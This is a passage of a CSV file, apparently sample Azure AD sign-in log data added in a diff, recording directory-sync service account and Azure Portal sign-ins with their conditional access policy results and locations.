'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 22:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8ad00b2e-7523-45f8-a6db-5c47b9942400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ad00b2e-7523-45f8-a6db-5c47b9942400,SigninLogs,Sucess,36.6404686,-78.26995087
+318,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:41.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,25bcf020-4603-445d-8479-ccebb5294c6f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 22:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8ad00b2e-7523-45f8-a6db-5c47b9942400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ad00b2e-7523-45f8-a6db-5c47b9942400,SigninLogs,Sucess,36.6404686,-78.26995087
+319,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:36.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d938a006-49cf-4291-bdb5-b849d73c0608,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 22:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",a9f59943-bd83-455b-86cd-4cf138e02500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,a9f59943-bd83-455b-86cd-4cf138e02500,SigninLogs,Sucess,36.6404686,-78.26995087
+320,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:40.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8827d77d-324a-4f3b-abf4-fade039cefb6,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 22:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",88cadf22-86a5-4f87-805f-6b2818852400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,88cadf22-86a5-4f87-805f-6b2818852400,SigninLogs,Sucess,36.6404686,-78.26995087
+321,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:35.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0719dab4-8042-4fae-b1c4-5cb36219946e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 22:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",fb48d823-caf0-47e0-9da1-41894d322400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,fb48d823-caf0-47e0-9da1-41894d322400,SigninLogs,Sucess,36.6404686,-78.26995087
+322,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:48.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0f5cbcb6-d96a-4833-858f-f6b4ccb44795,Microsoft.aadiam,Microsoft.aadiam,,Ashwin Patil,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",ad09f59c-2ec1-4ebf-90ab-0f25616e2500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.28070068359376, 'latitude': 48.18001174926758}, 'state': 'Washington', 'city': 'Stanwood'}",none,none,none,none,[],{'errorCode': 0},Ashwin Patil,c402b497-b502-403f-b685-807e0d3c7584,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ad09f59c-2ec1-4ebf-90ab-0f25616e2500,SigninLogs,Sucess,48.18001175,-122.2807007
+323,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:35.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0719dab4-8042-4fae-b1c4-5cb36219946e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 22:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",fb48d823-caf0-47e0-9da1-41894d322400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,fb48d823-caf0-47e0-9da1-41894d322400,SigninLogs,Sucess,36.6404686,-78.26995087
+324,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:39.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,20730239-457a-49f9-b538-9a7f22b420c9,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",231a1112-0bf5-4aba-9d7a-1056d6062500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,231a1112-0bf5-4aba-9d7a-1056d6062500,SigninLogs,Sucess,36.6404686,-78.26995087
